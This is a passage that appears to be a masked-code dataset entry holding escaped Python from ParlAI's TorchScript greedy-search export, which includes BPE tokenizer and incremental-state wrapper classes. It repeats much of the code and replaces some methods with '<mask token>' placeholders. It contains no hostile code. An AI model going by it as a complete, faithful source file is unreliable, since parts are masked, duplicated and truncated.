DecoderIncrStateFlattener(BaseIncrStateFlattener):\n \"\"\"\n Wrapper for a TransformerDecoder that will unflatten/flatten the incremental state.\n\n Unflattening/flattening will occur before passing the incremental state into and out\n of .forward().\n \"\"\"\n\n def forward(self, input_: torch.LongTensor, encoder_state: Tuple[torch.\n Tensor, torch.Tensor], flat_incr_state: Optional[Dict[str, torch.\n Tensor]]=None) ->Tuple[torch.Tensor, Dict[str, torch.Tensor]]:\n if flat_incr_state is not None:\n structured_incr_state = self._unflatten_incr_state(flat_incr_state)\n else:\n structured_incr_state = None\n tensor, new_structured_incr_state = self.module.forward(input=\n input_, encoder_state=encoder_state, incr_state=\n structured_incr_state)\n new_flat_incr_state = self._flatten_incr_state(\n new_structured_incr_state)\n return tensor, new_flat_incr_state\n\n\nclass ModelIncrStateFlattener(BaseIncrStateFlattener):\n \"\"\"\n Wrapper for a TransformerGeneratorModel to unflatten/flatten the incremental state.\n\n Unflattening/flattening will occur before passing the incremental state into and out\n of .reorder_decoder_incremental_state(). We also support .output(), which is also\n traced.\n \"\"\"\n\n def reorder_decoder_incremental_state(self, flat_incr_state: Dict[str,\n torch.Tensor], inds: torch.Tensor) ->Dict[str, torch.Tensor]:\n structured_incr_state = self._unflatten_incr_state(flat_incr_state)\n new_structured_incr_state = (self.module.\n reorder_decoder_incremental_state(incremental_state=\n structured_incr_state, inds=inds))\n return self._flatten_incr_state(new_structured_incr_state)\n\n def output(self, tensor: torch.Tensor) ->torch.Tensor:\n return self.module.output(tensor)\n\n\n@torch.jit.script\nclass ScriptableGpt2BpeHelper(object):\n \"\"\"\n Version of parlai.utils.bpe.Gpt2BpeHelper that can be TorchScripted.\n \"\"\"\n\n @classmethod\n def findall(cls, text: str) ->List[str]:\n \"\"\"\n Split tokens in a manner that replicates parlai.utils.bpe.Gpt2BpeHelper.\n \"\"\"\n contraction_endings = ['s', 't', 're', 've', 'm', 'll', 'd']\n tokens: List[str] = []\n idx = 0\n num_passes = 0\n while idx < len(text):\n num_passes += 1\n if num_passes > 10000:\n return [\n '*** Infinite loop in ScriptableGpt2BpeHelper.findall()! ***'\n ]\n if text[idx] == \"'\":\n captured_suffix = False\n for ending in contraction_endings:\n if text[idx + 1:idx + 1 + len(ending)] == ending:\n tokens.append(\"'\" + ending)\n idx += 1 + len(ending)\n captured_suffix = True\n break\n if captured_suffix:\n continue\n if not text[idx].isspace() or text[idx] == ' ' and idx + 1 < len(\n text) and not text[idx + 1].isspace():\n if text[idx] == ' ':\n last_matching_idx = idx + 1\n else:\n last_matching_idx = idx\n if text[last_matching_idx].isalpha():\n while last_matching_idx + 1 < len(text) and text[\n last_matching_idx + 1].isalpha():\n last_matching_idx += 1\n elif text[last_matching_idx].isnumeric():\n while last_matching_idx + 1 < len(text) and text[\n last_matching_idx + 1].isnumeric():\n last_matching_idx += 1\n else:\n while last_matching_idx + 1 < len(text) and not text[\n last_matching_idx + 1].isspace() and not text[\n last_matching_idx + 1].isalpha() and not text[\n last_matching_idx + 1].isnumeric():\n last_matching_idx += 1\n tokens.append(text[idx:last_matching_idx + 1])\n idx = last_matching_idx + 1\n continue\n if idx + 1 < len(text) and text[idx + 1].isspace():\n last_space_idx = idx + 1\n while last_space_idx + 1 < len(text) and text[\n last_space_idx + 1].isspace():\n last_space_idx += 1\n if last_space_idx + 1 == len(text):\n tokens.append(text[idx:last_space_idx + 1])\n idx = last_space_idx + 1\n else:\n tokens.append(text[idx:last_space_idx])\n idx = last_space_idx\n continue\n if True:\n last_space_idx = idx\n while last_space_idx + 1 < len(text) and text[\n last_space_idx + 1].isspace():\n last_space_idx += 1\n tokens.append(text[idx:last_space_idx + 1])\n idx = last_space_idx + 1\n return tokens\n\n def __init__(self, add_prefix_space: bool, encoder: Dict[str, str],\n byte_encoder: Dict[int, str], fused_key_bpe_ranks: Dict[str, float],\n special_tokens: List[str]):\n self.add_prefix_space = add_prefix_space\n self.encoder = encoder\n self.decoder: Dict[str, str] = {}\n for k, v in self.encoder.items():\n self.decoder[v] = k\n self.byte_encoder = byte_encoder\n self.byte_decoder: Dict[str, int] = {}\n for k, v in self.byte_encoder.items():\n self.byte_decoder[v] = k\n self.bpe_ranks = fused_key_bpe_ranks\n self._special_tokens: Dict[str, int] = {}\n for st in special_tokens:\n self._special_tokens[st] = 1\n\n def encode(self, text: str) ->List[str]:\n \"\"\"\n Tokenize text.\n\n Checks for add_prefix_space; handles accordingly.\n\n :param text:\n text to tokenize\n\n :return tokens:\n A list of tokens\n \"\"\"\n if self.add_prefix_space:\n text = f' {text}'\n FINAL = 1\n SPLITABLE = 0\n pieces: List[Tuple[str, int]] = [(text, SPLITABLE)]\n for special_token in self._special_tokens.keys():\n i = 0\n while i < len(pieces):\n subtext, status = pieces[i]\n if status == FINAL:\n i += 1\n continue\n split = subtext.split(special_token)\n if len(split) > 1:\n pieces.pop(i)\n for j, piece in enumerate(split):\n if j > 0:\n pieces.insert(i + j, (special_token, FINAL))\n pieces.insert(i + j + int(j > 0), (piece, SPLITABLE))\n else:\n i += 1\n output: List[str] = []\n for piece, state in pieces:\n if state is FINAL:\n output.append(piece)\n else:\n output += self.helper_encode(piece)\n text = ''.join(output)\n return output\n\n def get_pairs(self, word: List[str]) ->List[Tuple[str, str]]:\n \"\"\"\n Return set of symbol pairs in a word.\n\n Word is represented as list of symbols (symbols being variable-length strings).\n\n :param word:\n word to symbolize\n\n :return pairs:\n set of tuples of symbols\n \"\"\"\n pairs: List[Tuple[str, str]] = []\n prev_char = word[0]\n for char in word[1:]:\n pairs.append((prev_char, char))\n prev_char = char\n return pairs\n\n def bpe(self, word: List[str]) ->List[str]:\n \"\"\"\n Convert token to BPE.\n\n :param word:\n list of tokens token to convert\n\n :return bpe_encoding:\n string bpe encoding\n \"\"\"\n pairs = self.get_pairs(word)\n if len(pairs) == 0:\n return word\n while True:\n min_rank = self.bpe_ranks.get('\\n'.join(pairs[0]), float('inf'))\n bigram = pairs[0]\n for pair in pairs[1:]:\n current_rank = self.bpe_ranks.get('\\n'.join(pair), float('inf')\n )\n if current_rank < min_rank:\n min_rank = current_rank\n bigram = pair\n if '\\n'.join(bigram) not in self.bpe_ranks:\n break\n first, second = bigram\n new_word: List[str] = []\n i = 0\n while i < len(word):\n found = False\n for j in range(i, len(word)):\n if word[j] == first:\n new_word.extend(word[i:j])\n i = j\n found = True\n break\n if not found:\n new_word.extend(word[i:])\n break\n if word[i] == first and i < len(word) - 1 and word[i + 1\n ] == second:\n new_word.append(first + second)\n i += 2\n else:\n new_word.append(word[i])\n i += 1\n word = new_word.copy()\n if len(word) == 1:\n break\n else:\n pairs = self.get_pairs(word)\n return word\n\n def helper_encode(self, text: str) ->List[str]:\n \"\"\"\n Tokenize text.\n\n :param text:\n text to tokenize\n\n :return tokens:\n A list of tokens\n \"\"\"\n bpe_tokens: List[str] = []\n for token in self.findall(text):\n byte_encoded: List[str] = []\n for b in token:\n byte_encoded.append(self.byte_encoder[ord(b)])\n encoded: List[str] = []\n for bpe_token in self.bpe(byte_encoded):\n encoded.append(self.encoder[bpe_token])\n bpe_tokens.extend(encoded)\n return bpe_tokens\n\n def decode(self, tokens: List[str]) ->str:\n \"\"\"\n Decode list of tokens into a text string.\n\n :param tokens:\n list of tokens\n\n :return text:\n decoded text\n \"\"\"\n output: List[str] = []\n accum: List[str] = []\n for token in tokens:\n if token in self._special_tokens:\n if len(accum) > 0:\n output.append(self.helper_decode(accum))\n accum.clear()\n output.append(token)\n else:\n accum.append(token)\n if len(accum) > 0:\n output.append(self.helper_decode(accum))\n text = ''.join(output)\n if self.add_prefix_space:\n assert text.startswith(' ')\n text = text.lstrip(' ')\n return text\n\n def helper_decode(self, tokens: List[str]) ->str:\n \"\"\"\n Decode list of tokens into text string.\n\n :param tokens:\n list of tokens\n\n :return:\n decoded text\n \"\"\"\n chars: List[str] = []\n for token in tokens:\n decoded_token = self.decoder[token]\n token_chars = self.utf8_chars(decoded_token)\n for char in token_chars:\n if not torch.jit.is_scripting():\n chars.extend(list(char))\n else:\n chars.append(char)\n decoded_chars: List[str] = []\n for char in chars:\n decoded_chars.append(chr(self.byte_decoder[char]))\n return ''.join(decoded_chars)\n\n def utf8_chars(self, s: str) ->List[str]:\n \"\"\"\n An implementation of UTF8 character iteration in TorchScript. There are no\n bitwise operations in torchscript, so we compare directly to integer values.\n There isn't a lot of validation, for instance if you pass in an improperly\n encoded string with an out-of-place continuation byte, or with a non-left-to-\n right byte order, you'll get unexpected results and likely throw. Torch itself\n takes in unicode strings and encodes them as UTF8, so that should be actively\n hard to do.\n\n The logic is simple: looking at the current start-of-character byte.\n If its high bit is 0, it's a 1-byte character. Otherwise, the number of\n bytes is the number of leading 1s in its binary representation, so\n find that number by comparing it directly to ints with the appropriate\n representation, then append that many bytes as a character and move past\n them to the next start byte.\n\n From pytext.torchscript.utils.\n \"\"\"\n chars: List[str] = []\n i = 0\n while i < len(s):\n byte = ord(s[i])\n if byte < 128:\n chars.append(s[i])\n i += 1\n else:\n if byte < 224:\n num_bytes = 2\n elif byte < 240:\n num_bytes = 3\n elif byte < 248:\n num_bytes = 4\n elif byte < 252:\n num_bytes = 5\n elif byte < 254:\n num_bytes = 6\n elif byte < 255:\n num_bytes = 7\n else:\n num_bytes = 8\n chars.append(s[i:i + num_bytes])\n i += num_bytes\n return chars\n\n\n@torch.jit.script\nclass ScriptableDictionaryAgent:\n \"\"\"\n Builds and/or loads a dictionary.\n\n All code is TorchScriptable.\n \"\"\"\n\n def __init__(self, null_token: str, end_token: str, unk_token: str,\n start_token: str, freq: Dict[str, int], tok2ind: Dict[str, int],\n ind2tok: Dict[int, str], bpe_add_prefix_space: bool, bpe_encoder:\n Dict[str, str], bpe_byte_encoder: Dict[int, str],\n fused_key_bpe_ranks: Dict[str, float], special_tokens: List[str]):\n self.null_token = null_token\n self.end_token = end_token\n self.unk_token = unk_token\n self.start_token = start_token\n self.freq = freq\n self.tok2ind = tok2ind\n self.ind2tok = ind2tok\n self._unk_token_idx = self.tok2ind[self.unk_token]\n self.bpe = ScriptableGpt2BpeHelper(add_prefix_space=\n bpe_add_prefix_space, encoder=bpe_encoder, byte_encoder=\n bpe_byte_encoder, fused_key_bpe_ranks=fused_key_bpe_ranks,\n special_tokens=special_tokens)\n\n def _word_lookup(self, key: str) ->int:\n \"\"\"\n Return index from token, or unk_token's index, or None.\n \"\"\"\n if key in self.tok2ind:\n return self.tok2ind[key]\n else:\n return self._unk_token_idx\n\n def _index_lookup(self, key: int) ->str:\n \"\"\"\n Return token from index, or unk_token.\n \"\"\"\n if key in self.ind2tok:\n return self.ind2tok[key]\n else:\n return self.unk_token\n\n def gpt2_tokenize(self, text: str):\n \"\"\"\n Tokenize using Gpt2 BPE tokenizer.\n \"\"\"\n return self.bpe_tokenize(text)\n\n def tokenize(self, text: str) ->List[str]:\n \"\"\"\n Return a sequence of tokens from the iterable.\n\n Also handles special tokens for some tokenizers\n \"\"\"\n word_tokens = self.gpt2_tokenize(text)\n return word_tokens\n\n def bpe_tokenize(self, text: str) ->List[str]:\n \"\"\"\n Return a sequence of BPE-tokens from the text.\n \"\"\"\n return self.bpe.encode(text)\n\n def txt2vec(self, text: str) ->List[int]:\n \"\"\"\n Convert a string to a vector (list of ints).\n\n First runs a sentence tokenizer, then a word tokenizer.\n \"\"\"\n itr: List[int] = []\n for token in self.tokenize(str(text)):\n itr.append(self._word_lookup(token))\n return itr\n\n def vec2txt(self, vector: List[int]) ->str:\n \"\"\"\n Convert a vector of IDs to a string.\n\n Converts a vector (iterable of ints) into a string, with each token separated by\n the delimiter (default ``' '``).\n \"\"\"\n tokens = [self._index_lookup(idx) for idx in vector]\n text = self.bpe.decode(tokens)\n return text\n",
"step-4": "<mask token>\n\n\nclass TorchScriptGreedySearch(nn.Module):\n <mask token>\n <mask token>\n\n def __init__(self, agent: TorchAgent):\n super().__init__()\n self.is_bart = agent.opt['model'] == 'bart'\n for key, val in self.CAIRAOKE_DICT_PARAMS.items():\n assert agent.opt.get(key, val\n ) == val, f'The only currently supported value of \"{key}\" is {val}!'\n orig_dict: DictionaryAgent = agent.dict\n orig_bpe: Gpt2BpeHelper = orig_dict.bpe\n assert all(len(key) == 2 for key in orig_bpe.bpe_ranks.keys())\n assert not any(i for key in orig_bpe.bpe_ranks.keys() for i in key if\n '\\n' in i\n ), \"We need to temporarily merge the bpe_ranks dict's keys with a newline character in order to use it as a TorchScript arg, but at least one of the dict's keys contains a newline character already!\"\n fused_key_bpe_ranks = {'\\n'.join(key): float(val) for key, val in\n orig_bpe.bpe_ranks.items()}\n self.dict = ScriptableDictionaryAgent(null_token=orig_dict.\n null_token, end_token=orig_dict.end_token, unk_token=orig_dict.\n unk_token, start_token=orig_dict.start_token, freq=orig_dict.\n freq, tok2ind=orig_dict.tok2ind, ind2tok=orig_dict.ind2tok,\n bpe_add_prefix_space=agent.opt['bpe_add_prefix_space'],\n bpe_encoder=orig_bpe.encoder, bpe_byte_encoder=orig_bpe.\n byte_encoder, fused_key_bpe_ranks=fused_key_bpe_ranks,\n special_tokens=agent._get_special_tokens())\n self.delimiter_tok = agent.history.delimiter_tok\n self.history_size = agent.opt['history_size']\n if agent.opt.get('history_add_global_end_token', None) is not None:\n self.global_end_token = agent.dict[agent.dict.end_token]\n else:\n self.global_end_token = None\n self.text_truncate = agent.opt.get('text_truncate') or agent.opt[\n 'truncate']\n self.text_truncate = (self.text_truncate if self.text_truncate >= 0\n else None)\n self.start_idx = agent.model.START_IDX\n self.end_idx = agent.model.END_IDX\n self.null_idx = agent.model.NULL_IDX\n if self.is_bart:\n self.initial_decoder_input = [self.end_idx, self.start_idx]\n else:\n self.initial_decoder_input = [self.start_idx]\n agent.model.eval()\n wrapped_decoder = DecoderIncrStateFlattener(agent.model.decoder)\n wrapped_model = ModelIncrStateFlattener(agent.model)\n sample_tokens = torch.tensor([[1, 2, 3, 4, 5]], dtype=torch.long)\n encoder_states = agent.model.encoder(sample_tokens)\n initial_generations = self._get_initial_decoder_input(sample_tokens)\n latent, initial_incr_state = wrapped_decoder(initial_generations,\n encoder_states)\n logits = agent.model.output(latent[:, -1:, :])\n _, preds = logits.max(dim=2)\n incr_state = {k: torch.clone(v) for k, v in initial_incr_state.items()}\n incr_state = wrapped_model.reorder_decoder_incremental_state(incr_state\n , torch.tensor([0], dtype=torch.long, device=sample_tokens.device))\n generations = torch.cat([initial_generations, preds], dim=1)\n self.encoder = torch.jit.trace(agent.model.encoder, sample_tokens)\n self.decoder_first_pass = torch.jit.trace(wrapped_decoder, (\n initial_generations, encoder_states), strict=False)\n self.partially_traced_model = torch.jit.trace_module(wrapped_model,\n {'output': latent[:, -1:, :],\n 'reorder_decoder_incremental_state': (initial_incr_state, torch\n .tensor([0], dtype=torch.long, device=sample_tokens.device))},\n strict=False)\n self.decoder_later_pass = torch.jit.trace(wrapped_decoder, (\n generations, encoder_states, incr_state), strict=False)\n <mask token>\n <mask token>\n <mask token>\n\n def forward(self, context: str, max_len: int=128) ->str:\n history_vecs: List[List[int]] = []\n context_lines = context.split('\\n')\n if self.history_size > 0:\n context_lines = context_lines[-self.history_size:]\n for line in context_lines:\n history_vecs.append(self.parse(line))\n text_vecs: List[List[int]] = []\n for vec in history_vecs[:-1]:\n text_vecs += [vec]\n text_vecs += [self.delimiter_tok]\n text_vecs += [history_vecs[-1]]\n if self.global_end_token is not None:\n text_vecs += [[self.global_end_token]]\n flattened_text_vec: List[int] = []\n for vec in text_vecs:\n for token in vec:\n flattened_text_vec.append(token)\n if self.text_truncate is not None:\n if self.is_bart:\n truncate_length = self.text_truncate - 2\n else:\n truncate_length = self.text_truncate\n if len(flattened_text_vec) > truncate_length:\n flattened_text_vec = flattened_text_vec[-truncate_length:]\n flattened_text_vec = torch.tensor(flattened_text_vec, dtype=torch.long)\n if self.is_bart:\n flattened_text_vec = torch.cat([torch.tensor([self.start_idx],\n dtype=torch.long), flattened_text_vec, torch.tensor([self.\n end_idx], dtype=torch.long)], dim=0)\n batch_text_vec = torch.unsqueeze(flattened_text_vec, dim=0)\n encoder_states = self.encoder(batch_text_vec)\n generations = self._get_initial_decoder_input(batch_text_vec)\n seen_end = torch.zeros(batch_text_vec.size(0), device=\n batch_text_vec.device, dtype=torch.bool)\n incr_state: Dict[str, torch.Tensor] = {}\n for token_idx in range(max_len):\n if token_idx == 0:\n latent, incr_state = self.decoder_first_pass(generations,\n encoder_states)\n else:\n latent, incr_state = self.decoder_later_pass(generations,\n encoder_states, incr_state)\n logits = self.partially_traced_model.output(latent[:, -1:, :])\n _, preds = logits.max(dim=2)\n incr_state = (self.partially_traced_model.\n reorder_decoder_incremental_state(incr_state, torch.tensor(\n [0], dtype=torch.long, device=batch_text_vec.device)))\n seen_end = seen_end + (preds == self.end_idx).squeeze(1)\n generations = torch.cat([generations, preds], dim=1)\n if torch.all(seen_end):\n break\n if self.is_bart:\n assert generations[0, 0].item() == self.end_idx\n generations = generations[:, 1:]\n generation_tokens: List[int] = generations[0].tolist()\n label = self._v2t(generation_tokens)\n return label\n\n\nclass BaseIncrStateFlattener(nn.Module):\n \"\"\"\n Flatten/unflatten the incremental state for use with TorchScripting.\n\n Typically, the incremental state will be stored as a Dict[int, Dict[str, Dict[str,\n torch.Tensor]]], where the 3 dictionary levels map decoder layer, attention type,\n and previous key/value/mask, respectively. However, TorchScript expects dicts to be\n of type Dict[str, torch.Tensor], and thus all input incremental states when\n TorchScripting will have to be of that type. We thus unflatten the input incremental\n state, already of type Dict[str, torch.Tensor], to pass it into whatever method\n needs it, and we flatten it again after the updated incremental state is passed back\n out.\n\n This is a base class that provides methods for flattening/unflattening: subclasses\n will call these methods as the incremental state is passed into and out of their own\n methods.\n \"\"\"\n\n def __init__(self, module: nn.Module):\n super().__init__()\n self.module = module\n\n def _unflatten_incr_state(self, flat_incr_state: Dict[str, torch.Tensor]\n ) ->Dict[int, Dict[str, Dict[str, torch.Tensor]]]:\n \"\"\"\n Unflatten the input incremental state.\n\n For instance, flat_incr_state['layer_0__self_attn__prev_key'] will be stored in\n structured_incr_state[0]['self_attn']['prev_key'].\n \"\"\"\n structured_incr_state = defaultdict(lambda : defaultdict(dict))\n for key, state in flat_incr_state.items():\n layer_idx_str, attn_type, state_type = key.split('__')\n structured_incr_state[int(layer_idx_str)][attn_type][state_type\n ] = state\n return dict({k: dict(v) for k, v in structured_incr_state.items()})\n\n def _flatten_incr_state(self, structured_incr_state: Dict[int, Dict[str,\n Dict[str, torch.Tensor]]]) ->Dict[str, torch.Tensor]:\n \"\"\"\n Flatten the input incremental state.\n\n For instance, structured_incr_state[0]['self_attn']['prev_key'] will be stored\n in flat_incr_state['layer_0__self_attn__prev_key'].\n \"\"\"\n flat_incr_state = {}\n for layer_idx, dict1 in structured_incr_state.items():\n for attn_type, dict2 in dict1.items():\n for state_type, state in dict2.items():\n key = f'{layer_idx:d}__{attn_type}__{state_type}'\n flat_incr_state[key] = state\n return flat_incr_state\n\n\nclass DecoderIncrStateFlattener(BaseIncrStateFlattener):\n \"\"\"\n Wrapper for a TransformerDecoder that will unflatten/flatten the incremental state.\n\n Unflattening/flattening will occur before passing the incremental state into and out\n of .forward().\n \"\"\"\n\n def forward(self, input_: torch.LongTensor, encoder_state: Tuple[torch.\n Tensor, torch.Tensor], flat_incr_state: Optional[Dict[str, torch.\n Tensor]]=None) ->Tuple[torch.Tensor, Dict[str, torch.Tensor]]:\n if flat_incr_state is not None:\n structured_incr_state = self._unflatten_incr_state(flat_incr_state)\n else:\n structured_incr_state = None\n tensor, new_structured_incr_state = self.module.forward(input=\n input_, encoder_state=encoder_state, incr_state=\n structured_incr_state)\n new_flat_incr_state = self._flatten_incr_state(\n new_structured_incr_state)\n return tensor, new_flat_incr_state\n\n\nclass ModelIncrStateFlattener(BaseIncrStateFlattener):\n \"\"\"\n Wrapper for a TransformerGeneratorModel to unflatten/flatten the incremental state.\n\n Unflattening/flattening will occur before passing the incremental state into and out\n of .reorder_decoder_incremental_state(). We also support .output(), which is also\n traced.\n \"\"\"\n\n def reorder_decoder_incremental_state(self, flat_incr_state: Dict[str,\n torch.Tensor], inds: torch.Tensor) ->Dict[str, torch.Tensor]:\n structured_incr_state = self._unflatten_incr_state(flat_incr_state)\n new_structured_incr_state = (self.module.\n reorder_decoder_incremental_state(incremental_state=\n structured_incr_state, inds=inds))\n return self._flatten_incr_state(new_structured_incr_state)\n\n def output(self, tensor: torch.Tensor) ->torch.Tensor:\n return self.module.output(tensor)\n\n\n@torch.jit.script\nclass ScriptableGpt2BpeHelper(object):\n \"\"\"\n Version of parlai.utils.bpe.Gpt2BpeHelper that can be TorchScripted.\n \"\"\"\n\n @classmethod\n def findall(cls, text: str) ->List[str]:\n \"\"\"\n Split tokens in a manner that replicates parlai.utils.bpe.Gpt2BpeHelper.\n \"\"\"\n contraction_endings = ['s', 't', 're', 've', 'm', 'll', 'd']\n tokens: List[str] = []\n idx = 0\n num_passes = 0\n while idx < len(text):\n num_passes += 1\n if num_passes > 10000:\n return [\n '*** Infinite loop in ScriptableGpt2BpeHelper.findall()! ***'\n ]\n if text[idx] == \"'\":\n captured_suffix = False\n for ending in contraction_endings:\n if text[idx + 1:idx + 1 + len(ending)] == ending:\n tokens.append(\"'\" + ending)\n idx += 1 + len(ending)\n captured_suffix = True\n break\n if captured_suffix:\n continue\n if not text[idx].isspace() or text[idx] == ' ' and idx + 1 < len(\n text) and not text[idx + 1].isspace():\n if text[idx] == ' ':\n last_matching_idx = idx + 1\n else:\n last_matching_idx = idx\n if text[last_matching_idx].isalpha():\n while last_matching_idx + 1 < len(text) and text[\n last_matching_idx + 1].isalpha():\n last_matching_idx += 1\n elif text[last_matching_idx].isnumeric():\n while last_matching_idx + 1 < len(text) and text[\n last_matching_idx + 1].isnumeric():\n last_matching_idx += 1\n else:\n while last_matching_idx + 1 < len(text) and not text[\n last_matching_idx + 1].isspace() and not text[\n last_matching_idx + 1].isalpha() and not text[\n last_matching_idx + 1].isnumeric():\n last_matching_idx += 1\n tokens.append(text[idx:last_matching_idx + 1])\n idx = last_matching_idx + 1\n continue\n if idx + 1 < len(text) and text[idx + 1].isspace():\n last_space_idx = idx + 1\n while last_space_idx + 1 < len(text) and text[\n last_space_idx + 1].isspace():\n last_space_idx += 1\n if last_space_idx + 1 == len(text):\n tokens.append(text[idx:last_space_idx + 1])\n idx = last_space_idx + 1\n else:\n tokens.append(text[idx:last_space_idx])\n idx = last_space_idx\n continue\n if True:\n last_space_idx = idx\n while last_space_idx + 1 < len(text) and text[\n last_space_idx + 1].isspace():\n last_space_idx += 1\n tokens.append(text[idx:last_space_idx + 1])\n idx = last_space_idx + 1\n return tokens\n\n def __init__(self, add_prefix_space: bool, encoder: Dict[str, str],\n byte_encoder: Dict[int, str], fused_key_bpe_ranks: Dict[str, float],\n special_tokens: List[str]):\n self.add_prefix_space = add_prefix_space\n self.encoder = encoder\n self.decoder: Dict[str, str] = {}\n for k, v in self.encoder.items():\n self.decoder[v] = k\n self.byte_encoder = byte_encoder\n self.byte_decoder: Dict[str, int] = {}\n for k, v in self.byte_encoder.items():\n self.byte_decoder[v] = k\n self.bpe_ranks = fused_key_bpe_ranks\n self._special_tokens: Dict[str, int] = {}\n for st in special_tokens:\n self._special_tokens[st] = 1\n\n def encode(self, text: str) ->List[str]:\n \"\"\"\n Tokenize text.\n\n Checks for add_prefix_space; handles accordingly.\n\n :param text:\n text to tokenize\n\n :return tokens:\n A list of tokens\n \"\"\"\n if self.add_prefix_space:\n text = f' {text}'\n FINAL = 1\n SPLITABLE = 0\n pieces: List[Tuple[str, int]] = [(text, SPLITABLE)]\n for special_token in self._special_tokens.keys():\n i = 0\n while i < len(pieces):\n subtext, status = pieces[i]\n if status == FINAL:\n i += 1\n continue\n split = subtext.split(special_token)\n if len(split) > 1:\n pieces.pop(i)\n for j, piece in enumerate(split):\n if j > 0:\n pieces.insert(i + j, (special_token, FINAL))\n pieces.insert(i + j + int(j > 0), (piece, SPLITABLE))\n else:\n i += 1\n output: List[str] = []\n for piece, state in pieces:\n if state is FINAL:\n output.append(piece)\n else:\n output += self.helper_encode(piece)\n text = ''.join(output)\n return output\n\n def get_pairs(self, word: List[str]) ->List[Tuple[str, str]]:\n \"\"\"\n Return set of symbol pairs in a word.\n\n Word is represented as list of symbols (symbols being variable-length strings).\n\n :param word:\n word to symbolize\n\n :return pairs:\n set of tuples of symbols\n \"\"\"\n pairs: List[Tuple[str, str]] = []\n prev_char = word[0]\n for char in word[1:]:\n pairs.append((prev_char, char))\n prev_char = char\n return pairs\n\n def bpe(self, word: List[str]) ->List[str]:\n \"\"\"\n Convert token to BPE.\n\n :param word:\n list of tokens token to convert\n\n :return bpe_encoding:\n string bpe encoding\n \"\"\"\n pairs = self.get_pairs(word)\n if len(pairs) == 0:\n return word\n while True:\n min_rank = self.bpe_ranks.get('\\n'.join(pairs[0]), float('inf'))\n bigram = pairs[0]\n for pair in pairs[1:]:\n current_rank = self.bpe_ranks.get('\\n'.join(pair), float('inf')\n )\n if current_rank < min_rank:\n min_rank = current_rank\n bigram = pair\n if '\\n'.join(bigram) not in self.bpe_ranks:\n break\n first, second = bigram\n new_word: List[str] = []\n i = 0\n while i < len(word):\n found = False\n for j in range(i, len(word)):\n if word[j] == first:\n new_word.extend(word[i:j])\n i = j\n found = True\n break\n if not found:\n new_word.extend(word[i:])\n break\n if word[i] == first and i < len(word) - 1 and word[i + 1\n ] == second:\n new_word.append(first + second)\n i += 2\n else:\n new_word.append(word[i])\n i += 1\n word = new_word.copy()\n if len(word) == 1:\n break\n else:\n pairs = self.get_pairs(word)\n return word\n\n def helper_encode(self, text: str) ->List[str]:\n \"\"\"\n Tokenize text.\n\n :param text:\n text to tokenize\n\n :return tokens:\n A list of tokens\n \"\"\"\n bpe_tokens: List[str] = []\n for token in self.findall(text):\n byte_encoded: List[str] = []\n for b in token:\n byte_encoded.append(self.byte_encoder[ord(b)])\n encoded: List[str] = []\n for bpe_token in self.bpe(byte_encoded):\n encoded.append(self.encoder[bpe_token])\n bpe_tokens.extend(encoded)\n return bpe_tokens\n\n def decode(self, tokens: List[str]) ->str:\n \"\"\"\n Decode list of tokens into a text string.\n\n :param tokens:\n list of tokens\n\n :return text:\n decoded text\n \"\"\"\n output: List[str] = []\n accum: List[str] = []\n for token in tokens:\n if token in self._special_tokens:\n if len(accum) > 0:\n output.append(self.helper_decode(accum))\n accum.clear()\n output.append(token)\n else:\n accum.append(token)\n if len(accum) > 0:\n output.append(self.helper_decode(accum))\n text = ''.join(output)\n if self.add_prefix_space:\n assert text.startswith(' ')\n text = text.lstrip(' ')\n return text\n\n def helper_decode(self, tokens: List[str]) ->str:\n \"\"\"\n Decode list of tokens into text string.\n\n :param tokens:\n list of tokens\n\n :return:\n decoded text\n \"\"\"\n chars: List[str] = []\n for token in tokens:\n decoded_token = self.decoder[token]\n token_chars = self.utf8_chars(decoded_token)\n for char in token_chars:\n if not torch.jit.is_scripting():\n chars.extend(list(char))\n else:\n chars.append(char)\n decoded_chars: List[str] = []\n for char in chars:\n decoded_chars.append(chr(self.byte_decoder[char]))\n return ''.join(decoded_chars)\n\n def utf8_chars(self, s: str) ->List[str]:\n \"\"\"\n An implementation of UTF8 character iteration in TorchScript. There are no\n bitwise operations in torchscript, so we compare directly to integer values.\n There isn't a lot of validation, for instance if you pass in an improperly\n encoded string with an out-of-place continuation byte, or with a non-left-to-\n right byte order, you'll get unexpected results and likely throw. Torch itself\n takes in unicode strings and encodes them as UTF8, so that should be actively\n hard to do.\n\n The logic is simple: looking at the current start-of-character byte.\n If its high bit is 0, it's a 1-byte character. Otherwise, the number of\n bytes is the number of leading 1s in its binary representation, so\n find that number by comparing it directly to ints with the appropriate\n representation, then append that many bytes as a character and move past\n them to the next start byte.\n\n From pytext.torchscript.utils.\n \"\"\"\n chars: List[str] = []\n i = 0\n while i < len(s):\n byte = ord(s[i])\n if byte < 128:\n chars.append(s[i])\n i += 1\n else:\n if byte < 224:\n num_bytes = 2\n elif byte < 240:\n num_bytes = 3\n elif byte < 248:\n num_bytes = 4\n elif byte < 252:\n num_bytes = 5\n elif byte < 254:\n num_bytes = 6\n elif byte < 255:\n num_bytes = 7\n else:\n num_bytes = 8\n chars.append(s[i:i + num_bytes])\n i += num_bytes\n return chars\n\n\n@torch.jit.script\nclass ScriptableDictionaryAgent:\n \"\"\"\n Builds and/or loads a dictionary.\n\n All code is TorchScriptable.\n \"\"\"\n\n def __init__(self, null_token: str, end_token: str, unk_token: str,\n start_token: str, freq: Dict[str, int], tok2ind: Dict[str, int],\n ind2tok: Dict[int, str], bpe_add_prefix_space: bool, bpe_encoder:\n Dict[str, str], bpe_byte_encoder: Dict[int, str],\n fused_key_bpe_ranks: Dict[str, float], special_tokens: List[str]):\n self.null_token = null_token\n self.end_token = end_token\n self.unk_token = unk_token\n self.start_token = start_token\n self.freq = freq\n self.tok2ind = tok2ind\n self.ind2tok = ind2tok\n self._unk_token_idx = self.tok2ind[self.unk_token]\n self.bpe = ScriptableGpt2BpeHelper(add_prefix_space=\n bpe_add_prefix_space, encoder=bpe_encoder, byte_encoder=\n bpe_byte_encoder, fused_key_bpe_ranks=fused_key_bpe_ranks,\n special_tokens=special_tokens)\n\n def _word_lookup(self, key: str) ->int:\n \"\"\"\n Return index from token, or unk_token's index, or None.\n \"\"\"\n if key in self.tok2ind:\n return self.tok2ind[key]\n else:\n return self._unk_token_idx\n\n def _index_lookup(self, key: int) ->str:\n \"\"\"\n Return token from index, or unk_token.\n \"\"\"\n if key in self.ind2tok:\n return self.ind2tok[key]\n else:\n return self.unk_token\n\n def gpt2_tokenize(self, text: str):\n \"\"\"\n Tokenize using Gpt2 BPE tokenizer.\n 